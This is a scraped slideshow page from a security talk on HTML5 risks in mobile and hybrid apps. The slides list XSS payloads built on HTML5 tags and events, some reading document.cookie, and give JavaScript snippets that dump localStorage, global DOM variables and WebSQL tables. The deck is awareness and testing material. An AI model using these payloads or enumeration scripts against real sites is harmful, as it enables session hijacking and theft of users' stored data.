Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Html5 on mobile

533 views

Published on

HTML5 related mobile security issues and concerns.

Published in: Software
  • Be the first to comment

  • Be the first to like this

Html5 on mobile

  1. 1. © Blueinfy Solutions HTML5 and Mobile
  2. 2. © Blueinfy Solutions What is HTML5 • Enhancement to HTML 4.01 – with more tags – API Support – Functionality to support mobile devices – More types for existing tags • Does not mean old tags will not work • Existing application can be converted by changing “<!DOCTYPE html>” in first line
  3. 3. © Blueinfy Solutions HTML5 in Mobile • It is changing the game • Apps are migrating to HTML5 and no need to use native • Web vs. Mobile – Both can use HTML5 – No need to manage several code base – HTML+CSS+JS only – Server side services
  4. 4. © Blueinfy Solutions Technology Vectors
  5. 5. © Blueinfy Solutions What is running - where??? Presentation Layer Business Layer Data Access Layer Authentication Communication etc. Runtime, Platform, Operating System Components Server side Components Client side Components (Browser) • HTML 5 • DOM • XHR • WebSocket • Storage • WebSQL • Flash • Flex • AMF • Silverlight • WCF • XAML • NET • Storage • JS • Android • iPhone/Pad • Other Mobile
  6. 6. © Blueinfy Solutions HTML5 in nutshell - Specs 6 Source: http://en.wikipedia.org/wiki/File:HTML5-APIs-and-related-technologies-by-Sergey-Mavrody.png Source: http://html5demos.com/ Evolution going on by Web Hypertext Application Technology Working Group (WHATWG)
  7. 7. © Blueinfy Solutions Key HTML5 features for Mobile • Offline web application support • Web Storage • GeoLocation API • Canvas 2D Drawing • Video and Audio streaming support 7
  8. 8. © Blueinfy Solutions HTML5 features not supported on Mobile • Microdata • 3D animation • FileReader API • IndexDB • WebWorkers 8
  9. 9. © Blueinfy Solutions API (Media, Geo etc.) & Messaging Plug-In Modern Browser Model HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS/Content-Sec Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache FileSystem
  10. 10. © Blueinfy Solutions Abusing HTML 5 Tags • Various new tags and can be abused, may not be filtered or validated • Media tags <video poster=javascript:alert(document.cookie)// <audio><source onerror="javascript:alert(document.cookie)"> • Form tags <form><button formaction="javascript:alert(document.cookie)">foo <body oninput=alert(document.cookie)><input autofocus> 10
  11. 11. © Blueinfy Solutions Accessing media tags
  12. 12. © Blueinfy Solutions Moving/Touch
  13. 13. © Blueinfy Solutions Login cookie
  14. 14. © Blueinfy Solutions Profile • Fetch through storage – cookie not needed…
  15. 15. © Blueinfy Solutions WebSQL data • Through JavaScript one can store information on database. • Example 15
  16. 16. © Blueinfy Solutions One time fetch
  17. 17. © Blueinfy Solutions Network calls • HTML 5 provides WebSocket and XHR Level 2 calls • It allows to make cross domains call and raw socket capabilities • It can be leveraged by JavaScript payload • Malware or worm can use it to perform several scanning tasks 17
  18. 18. © Blueinfy Solutions Same Origin Policy (SOP) • Browser’s sandbox – Protocol, Host and Port should match – It is possible to set document.domain to parent domain if current context is child domain – Top level domain (TLD) locking down helps in sandboxing the context 18
  19. 19. © Blueinfy Solutions Fetching Location
  20. 20. © Blueinfy Solutions Location calls
  21. 21. © Blueinfy Solutions Hybrid App • Android
  22. 22. © Blueinfy Solutions Integrating native to webview • Hook your handlers to make it hybrid • Interact with webview
  23. 23. © Blueinfy Solutions Set permissions • Manifest file
  24. 24. © Blueinfy Solutions Loading Hybrid App
  25. 25. © Blueinfy Solutions Slidebar type touch views
  26. 26. © Blueinfy Solutions HTML5 Attacks
  27. 27. © Blueinfy Solutions API (Media, Geo etc.) & Messaging Plug-In XSS with HTML5 (tags, attributes and events) HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  28. 28. © Blueinfy Solutions HTML5 – Tags/Attributes/Events • Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys) • Attributes – form, submit, autofocus, sandbox, manifest, rel etc. • Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. 28
  29. 29. © Blueinfy Solutions XSS variants • Media tags • Examples – <video><source onerror="javascript:alert(1)“> – <video onerror="javascript:alert(1)"><source> 29
  30. 30. © Blueinfy Solutions XSS variants • Exploiting autofocus – <input autofocus onfocus=alert(1)> – <select autofocus onfocus=alert(1)> – <textarea autofocus onfocus=alert(1)> – <keygen autofocus onfocus=alert(1)> 30
  31. 31. © Blueinfy Solutions XSS variants • Form & Button etc. – <form id="test" /><button form="test" formaction="javascript:alert(1)">test – <form><button formaction="javascript:alert(1)">test • Etc … and more … – Nice HTML5 XSS cheat sheet (http://html5sec.org/) 31
  32. 32. © Blueinfy Solutions • Once have an entry point – game over! Extraction through XSS
  33. 33. © Blueinfy Solutions API (Media, Geo etc.) & Messaging Plug-In Web Storage and DOM information extraction HTML5 + CSS Silverlight Flash Browser Native Network Services XHR 1 & 2 WebSocket Plug-in Sockets JavaScript DOM/Events Parser/Threads SOP/CORS Sandbox Presentation Process & Logic Network & Access Core Policies StorageWebSQL Mobile Cache
  34. 34. © Blueinfy Solutions Web Storage Extraction • Browser has one place to store data – Cookie (limited and replayed) • HTML5 – Storage API provided (Local and Session) • Can hold global scoped variables • http://www.w3.org/TR/webstorage/ 34
  35. 35. © Blueinfy Solutions Web Storage Extraction • It is possible to steal them through XSS or via JavaScript • Session hijacking – HttpOnly of no use • getItem and setItem calls • XSS the box and scan through storage
  36. 36. © Blueinfy Solutions Blind storage enumeration if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); } } • Above code allows all storage variable extraction 36
  37. 37. © Blueinfy Solutions • HTML5 provides virtual file system with filesystem APIs – window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem; • It becomes a full blown local system for application in sandbox • It empowers application File System Storage
  38. 38. © Blueinfy Solutions • It provides temporary or permanent file system function init() { window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) { filesys = filesystem; }, catcherror); } • App can have full filesystem in place now. File System Storage
  39. 39. © Blueinfy Solutions • Assuming app is creating profile on local system Sensitive information filesystem
  40. 40. © Blueinfy Solutions DOM Storage • Applications run with “rich” DOM • JavaScript sets several variables and parameters while loading – GLOBALS • It has sensitive information and what if they are GLOBAL and remains during the life of application • It can be retrieved with XSS • HTTP request and response are going through JavaScripts (XHR) – what about those vars?
  41. 41. © Blueinfy Solutions Blind Enumeration for(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){} } 41
  42. 42. © Blueinfy Solutions Global Sensitive Information Extraction from DOM • HTML5 apps running on Single DOM • Having several key global variables, objects and array – var arrayGlobals = ['my@email.com',"12141hewvsdr9321343423mjf dvint","test.com"]; • Post DOM based exploitation possible and harvesting all these values. 42
  43. 43. © Blueinfy Solutions Global Sensitive Information Extraction from DOM for(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} } } 43
  44. 44. © Blueinfy Solutions SQL Injection • WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. • Allows one time data loading and offline browsing capabilities. • Causes security concern and potential injection points. • Methods and calls are possible
  45. 45. © Blueinfy Solutions SQL Injection • Through JavaScript one can harvest entire local database. • Example
  46. 46. © Blueinfy Solutions Blind WebSQL Enumeration • We need following to exploit – Database object – Table structure created on SQLite – User table on which we need to run select query 46
  47. 47. © Blueinfy Solutions Blind WebSQL Enumeration var dbo; var table; var usertable; for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'', [],function(tx,results){ table=results; },null); }); } }catch(ex){} } if(table.rows.length>1) usertable=table.rows.item(1).name; 47
  48. 48. © Blueinfy Solutions Blind WebSQL Enumeration • We will run through all objects and get object where constructor is “Database” • We will make Select query directly to sqlite_master database • We will grab 1st table leaving webkit table on 0th entry 48
  49. 49. © Blueinfy Solutions Blind WebSQL Enumeration 49
  50. 50. © Blueinfy Solutions Conclusion

×